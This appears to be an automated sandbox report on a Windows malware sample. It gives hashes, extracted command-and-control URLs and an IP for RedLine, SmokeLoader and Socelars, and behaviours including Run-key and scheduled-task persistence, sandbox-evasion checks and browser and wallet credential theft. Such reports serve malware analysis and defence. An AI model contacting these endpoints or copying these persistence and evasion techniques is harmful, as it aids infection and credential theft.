Analysis
-
max time kernel
99s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
10-03-2022 20:23
Static task
static1
Behavioral task
behavioral1
Sample
4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
Resource
win7-20220310-en
Behavioral task
behavioral2
Sample
4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
Resource
win10v2004-en-20220113
General
-
Target
4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
-
Size
4.2MB
-
MD5
256f52afa96f131dfdb397a93fb74852
-
SHA1
b2bebbce4a9804258cc4b6ad62a16cab80728587
-
SHA256
4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31
-
SHA512
0a3c4452cf1c1b6be951f5c9fe1da2b527ba47e1a1538d8d8566bb1188f442401a06187bb6ecaa939b954519dbc618fbed16e214acd58b53b081db46ba7a896d
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
dadad123
86.107.197.196:63065
-
auth_value
dd4834614a3ac04a7b90791c224626a2
Signatures
-
DcRat 10 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
fhvct4NKRv1MuwyM8AyODJx_.exeschtasks.exeschtasks.exeschtasks.exepzyh.exeschtasks.exeschtasks.exe4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exeschtasks.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\"" fhvct4NKRv1MuwyM8AyODJx_.exe 5932 schtasks.exe 4700 schtasks.exe 5340 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe 5940 schtasks.exe 484 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe 4240 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Admin\\My Documents\\conhost.exe\"" fhvct4NKRv1MuwyM8AyODJx_.exe -
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4240 3884 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5940 3884 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 484 3884 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5932 3884 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/5476-398-0x0000000000DE0000-0x0000000001142000-memory.dmp family_redline behavioral2/memory/5476-394-0x0000000000DE0000-0x0000000001142000-memory.dmp family_redline behavioral2/memory/5476-393-0x0000000000DE0000-0x0000000001142000-memory.dmp family_redline behavioral2/memory/5476-403-0x0000000000DE0000-0x0000000001142000-memory.dmp family_redline behavioral2/memory/5852-412-0x0000000000A90000-0x0000000000DD5000-memory.dmp family_redline behavioral2/memory/5836-411-0x00000000003C0000-0x0000000000705000-memory.dmp family_redline behavioral2/memory/5836-426-0x00000000003C0000-0x0000000000705000-memory.dmp family_redline behavioral2/memory/5852-428-0x0000000000A90000-0x0000000000DD5000-memory.dmp family_redline behavioral2/memory/5852-431-0x0000000000A90000-0x0000000000DD5000-memory.dmp family_redline behavioral2/memory/5836-414-0x00000000003C0000-0x0000000000705000-memory.dmp family_redline behavioral2/memory/5476-406-0x0000000000DE0000-0x0000000001142000-memory.dmp family_redline behavioral2/memory/5288-405-0x0000000000080000-0x00000000000A0000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars -
OnlyLogger Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4268-172-0x0000000000700000-0x0000000000730000-memory.dmp family_onlylogger behavioral2/memory/4268-174-0x0000000000400000-0x00000000005E6000-memory.dmp family_onlylogger behavioral2/memory/5636-409-0x0000000000630000-0x0000000000674000-memory.dmp family_onlylogger behavioral2/memory/5636-419-0x0000000000400000-0x0000000000492000-memory.dmp family_onlylogger -
Downloads MZ/PE file
-
Executes dropped EXE 42 IoCs
Processes:
Files.exeKRSetp.exeFile.exeFolder.exeInfo.exeFile.exeInstall.exejg3_3uag.exepzyh.exeInstallation.exepub2.exejfiag3g_gg.exejfiag3g_gg.exeT0jlrpsGGUYr4eISutfzJGw3.exefhvct4NKRv1MuwyM8AyODJx_.exe8LYdi6ebdnfzHFB1_bWgzJGK.exevUSKLYkUlN7iZZdPiIOcfRq9.exe6mM5wc4MNICotg_rhaS83KUX.exeiCvrT7Kt4p0VQnPOaAK1bUuw.exehxK9HRML3gADcksTmKKPtJTV.exe3zrdpp1YNurQ9BvFo_I16hXV.exexnPfNBTqQGpxzwtTAJgl0Pwi.exeDyxVIXsNsKer_eZTImK_hMIG.exeXB562pl90hdu1ztAiENZv8ad.exegsRqUqtuYTRkYMiJYJ0ZdsHq.exextqmxtTKWEfE8t8uqfXbvBNB.exe9FJLQu4A_WqLnwf6TNi2ThAm.exe75BsMTOUWXlbqzaIQpyJ6if7.exeBJEsf_U8Nn986YcrD7DpuoI2.exeQM0VjrM43wjfbjwxlnNpeiLt.exeeYWJfcyLudf_is8eTK_AhCIG.exefindstr.exeInstall.exeKJAC6.exe3aa92756-575d-46ac-926b-6b220ed24ba3.exeBFE5C.exe57F2H.exeInstall.exe1CILB.exe1CILB33H9E8BCC5.execonhost.exeAccostarmi.exe.pifpid process 3616 Files.exe 3464 KRSetp.exe 3804 File.exe 3720 Folder.exe 988 Info.exe 4904 File.exe 4268 Install.exe 380 jg3_3uag.exe 5116 pzyh.exe 5080 Installation.exe 4636 pub2.exe 2716 jfiag3g_gg.exe 2964 jfiag3g_gg.exe 5404 T0jlrpsGGUYr4eISutfzJGw3.exe 5472 fhvct4NKRv1MuwyM8AyODJx_.exe 5476 8LYdi6ebdnfzHFB1_bWgzJGK.exe 5496 vUSKLYkUlN7iZZdPiIOcfRq9.exe 5536 6mM5wc4MNICotg_rhaS83KUX.exe 5596 iCvrT7Kt4p0VQnPOaAK1bUuw.exe 5636 hxK9HRML3gADcksTmKKPtJTV.exe 5704 3zrdpp1YNurQ9BvFo_I16hXV.exe 5736 xnPfNBTqQGpxzwtTAJgl0Pwi.exe 5832 DyxVIXsNsKer_eZTImK_hMIG.exe 5288 XB562pl90hdu1ztAiENZv8ad.exe 5836 gsRqUqtuYTRkYMiJYJ0ZdsHq.exe 5852 xtqmxtTKWEfE8t8uqfXbvBNB.exe 5412 9FJLQu4A_WqLnwf6TNi2ThAm.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 6020 BJEsf_U8Nn986YcrD7DpuoI2.exe 3588 QM0VjrM43wjfbjwxlnNpeiLt.exe 4048 eYWJfcyLudf_is8eTK_AhCIG.exe 5432 findstr.exe 6076 Install.exe 5652 KJAC6.exe 5320 3aa92756-575d-46ac-926b-6b220ed24ba3.exe 648 BFE5C.exe 3440 57F2H.exe 5312 Install.exe 4252 1CILB.exe 5336 1CILB33H9E8BCC5.exe 1804 conhost.exe 2180 Accostarmi.exe.pif -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect behavioral2/memory/380-150-0x0000000000400000-0x0000000000648000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exeFiles.exeFolder.exeFile.exe9FJLQu4A_WqLnwf6TNi2ThAm.exeiCvrT7Kt4p0VQnPOaAK1bUuw.exefhvct4NKRv1MuwyM8AyODJx_.exeInstall.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Files.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation File.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 9FJLQu4A_WqLnwf6TNi2ThAm.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation iCvrT7Kt4p0VQnPOaAK1bUuw.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation fhvct4NKRv1MuwyM8AyODJx_.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 15 IoCs
Processes:
pub2.exerUNdlL32.eXe75BsMTOUWXlbqzaIQpyJ6if7.exevUSKLYkUlN7iZZdPiIOcfRq9.exepid process 4636 pub2.exe 3296 rUNdlL32.eXe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 5496 vUSKLYkUlN7iZZdPiIOcfRq9.exe 5496 vUSKLYkUlN7iZZdPiIOcfRq9.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
fhvct4NKRv1MuwyM8AyODJx_.exe57F2H.exepzyh.exemsedge.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.VisualElementsManifest\\msedge.exe\"" fhvct4NKRv1MuwyM8AyODJx_.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" 57F2H.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\"" fhvct4NKRv1MuwyM8AyODJx_.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Admin\\My Documents\\conhost.exe\"" fhvct4NKRv1MuwyM8AyODJx_.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\System32\\cmmon32\\conhost.exe\"" fhvct4NKRv1MuwyM8AyODJx_.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg3_3uag.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg3_3uag.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ipinfo.io 11 ipinfo.io 16 ip-api.com 264 ipinfo.io 265 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe -
Drops file in System32 directory 3 IoCs
Processes:
Install.exefhvct4NKRv1MuwyM8AyODJx_.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\cmmon32\conhost.exe fhvct4NKRv1MuwyM8AyODJx_.exe File created C:\Windows\SysWOW64\cmmon32\088424020bedd6 fhvct4NKRv1MuwyM8AyODJx_.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
8LYdi6ebdnfzHFB1_bWgzJGK.exefhvct4NKRv1MuwyM8AyODJx_.exegsRqUqtuYTRkYMiJYJ0ZdsHq.exextqmxtTKWEfE8t8uqfXbvBNB.exeQM0VjrM43wjfbjwxlnNpeiLt.exefindstr.exeKJAC6.exeBFE5C.exe57F2H.execonhost.exepid process 5476 8LYdi6ebdnfzHFB1_bWgzJGK.exe 5472 fhvct4NKRv1MuwyM8AyODJx_.exe 5836 gsRqUqtuYTRkYMiJYJ0ZdsHq.exe 5852 xtqmxtTKWEfE8t8uqfXbvBNB.exe 3588 QM0VjrM43wjfbjwxlnNpeiLt.exe 5472 fhvct4NKRv1MuwyM8AyODJx_.exe 5432 findstr.exe 5652 KJAC6.exe 648 BFE5C.exe 3440 57F2H.exe 1804 conhost.exe 1804 conhost.exe 1804 conhost.exe -
Drops file in Program Files directory 7 IoCs
Processes:
setup.exefhvct4NKRv1MuwyM8AyODJx_.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310220156.pma setup.exe File created C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe fhvct4NKRv1MuwyM8AyODJx_.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe fhvct4NKRv1MuwyM8AyODJx_.exe File created C:\Program Files (x86)\Windows Defender\es-ES\9e8d7a4ca61bd9 fhvct4NKRv1MuwyM8AyODJx_.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe fhvct4NKRv1MuwyM8AyODJx_.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\61a52ddc9dd915 fhvct4NKRv1MuwyM8AyODJx_.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\82ae69f7-c77e-45e8-8dca-f53e134cfbb5.tmp setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1284 3296 WerFault.exe rUNdlL32.eXe 5584 5404 WerFault.exe T0jlrpsGGUYr4eISutfzJGw3.exe 3188 5536 WerFault.exe 6mM5wc4MNICotg_rhaS83KUX.exe 648 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 5944 5736 WerFault.exe xnPfNBTqQGpxzwtTAJgl0Pwi.exe 836 5404 WerFault.exe T0jlrpsGGUYr4eISutfzJGw3.exe 2028 5536 WerFault.exe 6mM5wc4MNICotg_rhaS83KUX.exe 3120 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 3180 5736 WerFault.exe xnPfNBTqQGpxzwtTAJgl0Pwi.exe 3244 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 5264 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 1688 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 1848 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 5472 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 5244 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 5264 5636 WerFault.exe hxK9HRML3gADcksTmKKPtJTV.exe 5776 4488 WerFault.exe explorer.exe 6072 1688 WerFault.exe explorer.exe 1308 4528 WerFault.exe notepad.exe 2648 5912 WerFault.exe notepad.exe 5840 5912 WerFault.exe notepad.exe 6088 4528 WerFault.exe notepad.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
pub2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
75BsMTOUWXlbqzaIQpyJ6if7.exe3aa92756-575d-46ac-926b-6b220ed24ba3.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 75BsMTOUWXlbqzaIQpyJ6if7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 75BsMTOUWXlbqzaIQpyJ6if7.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 3aa92756-575d-46ac-926b-6b220ed24ba3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 3aa92756-575d-46ac-926b-6b220ed24ba3.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 484 schtasks.exe 5932 schtasks.exe 4700 schtasks.exe 5340 schtasks.exe 4240 schtasks.exe 5940 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5704 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 5956 tasklist.exe 5400 tasklist.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
msedge.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 2300 taskkill.exe 4680 taskkill.exe 5688 taskkill.exe -
Processes:
1CILB33H9E8BCC5.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch 1CILB33H9E8BCC5.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" 1CILB33H9E8BCC5.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync 1CILB33H9E8BCC5.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" 1CILB33H9E8BCC5.exe -
Modifies registry class 5 IoCs
Processes:
Folder.exemsedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Folder.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pub2.exemsedge.exemsedge.exejfiag3g_gg.exemsedge.exepid process 4636 pub2.exe 4636 pub2.exe 4504 msedge.exe 4504 msedge.exe 4344 msedge.exe 4344 msedge.exe 2964 jfiag3g_gg.exe 2964 jfiag3g_gg.exe 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 5096 msedge.exe 5096 msedge.exe 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pub2.exepid process 4636 pub2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
KRSetp.exeInstallation.exetaskkill.exeInfo.exedescription pid process Token: SeDebugPrivilege 3464 KRSetp.exe Token: SeCreateTokenPrivilege 5080 Installation.exe Token: SeAssignPrimaryTokenPrivilege 5080 Installation.exe Token: SeLockMemoryPrivilege 5080 Installation.exe Token: SeIncreaseQuotaPrivilege 5080 Installation.exe Token: SeMachineAccountPrivilege 5080 Installation.exe Token: SeTcbPrivilege 5080 Installation.exe Token: SeSecurityPrivilege 5080 Installation.exe Token: SeTakeOwnershipPrivilege 5080 Installation.exe Token: SeLoadDriverPrivilege 5080 Installation.exe Token: SeSystemProfilePrivilege 5080 Installation.exe Token: SeSystemtimePrivilege 5080 Installation.exe Token: SeProfSingleProcessPrivilege 5080 Installation.exe Token: SeIncBasePriorityPrivilege 5080 Installation.exe Token: SeCreatePagefilePrivilege 5080 Installation.exe Token: SeCreatePermanentPrivilege 5080 Installation.exe Token: SeBackupPrivilege 5080 Installation.exe Token: SeRestorePrivilege 5080 Installation.exe Token: SeShutdownPrivilege 5080 Installation.exe Token: SeDebugPrivilege 5080 Installation.exe Token: SeAuditPrivilege 5080 Installation.exe Token: SeSystemEnvironmentPrivilege 5080 Installation.exe Token: SeChangeNotifyPrivilege 5080 Installation.exe Token: SeRemoteShutdownPrivilege 5080 Installation.exe Token: SeUndockPrivilege 5080 Installation.exe Token: SeSyncAgentPrivilege 5080 Installation.exe Token: SeEnableDelegationPrivilege 5080 Installation.exe Token: SeManageVolumePrivilege 5080 Installation.exe Token: SeImpersonatePrivilege 5080 Installation.exe Token: SeCreateGlobalPrivilege 5080 Installation.exe Token: 31 5080 Installation.exe Token: 32 5080 Installation.exe Token: 33 5080 Installation.exe Token: 34 5080 Installation.exe Token: 35 5080 Installation.exe Token: SeDebugPrivilege 2300 taskkill.exe Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeDebugPrivilege 988 Info.exe Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 -
Suspicious use of FindShellTrayWindow 24 IoCs
Processes:
File.exemsedge.exeAccostarmi.exe.pifpid process 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 5096 msedge.exe 5096 msedge.exe 2232 5096 msedge.exe 2232 2232 2232 2232 2180 Accostarmi.exe.pif 2232 2232 2180 Accostarmi.exe.pif 2180 Accostarmi.exe.pif 2232 2232 -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
File.exeAccostarmi.exe.pifpid process 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 3804 File.exe 2180 Accostarmi.exe.pif 2180 Accostarmi.exe.pif 2180 Accostarmi.exe.pif -
Suspicious use of SetWindowsHookEx 27 IoCs
Processes:
File.exeT0jlrpsGGUYr4eISutfzJGw3.exefhvct4NKRv1MuwyM8AyODJx_.exevUSKLYkUlN7iZZdPiIOcfRq9.exe8LYdi6ebdnfzHFB1_bWgzJGK.exe6mM5wc4MNICotg_rhaS83KUX.exeDyxVIXsNsKer_eZTImK_hMIG.exegsRqUqtuYTRkYMiJYJ0ZdsHq.exextqmxtTKWEfE8t8uqfXbvBNB.exexnPfNBTqQGpxzwtTAJgl0Pwi.exe9FJLQu4A_WqLnwf6TNi2ThAm.exe75BsMTOUWXlbqzaIQpyJ6if7.exeBJEsf_U8Nn986YcrD7DpuoI2.exeQM0VjrM43wjfbjwxlnNpeiLt.exefindstr.exeInstall.exeKJAC6.exeBFE5C.exe57F2H.exeInstall.exe1CILB.execonhost.exe1CILB33H9E8BCC5.exeAccostarmi.exe.pifpid process 4904 File.exe 5404 T0jlrpsGGUYr4eISutfzJGw3.exe 5472 fhvct4NKRv1MuwyM8AyODJx_.exe 5496 vUSKLYkUlN7iZZdPiIOcfRq9.exe 5476 8LYdi6ebdnfzHFB1_bWgzJGK.exe 5472 fhvct4NKRv1MuwyM8AyODJx_.exe 5536 6mM5wc4MNICotg_rhaS83KUX.exe 5832 DyxVIXsNsKer_eZTImK_hMIG.exe 5836 gsRqUqtuYTRkYMiJYJ0ZdsHq.exe 5852 xtqmxtTKWEfE8t8uqfXbvBNB.exe 5736 xnPfNBTqQGpxzwtTAJgl0Pwi.exe 5412 9FJLQu4A_WqLnwf6TNi2ThAm.exe 5352 75BsMTOUWXlbqzaIQpyJ6if7.exe 6020 BJEsf_U8Nn986YcrD7DpuoI2.exe 3588 QM0VjrM43wjfbjwxlnNpeiLt.exe 5432 findstr.exe 6076 Install.exe 5652 KJAC6.exe 648 BFE5C.exe 3440 57F2H.exe 5312 Install.exe 4252 1CILB.exe 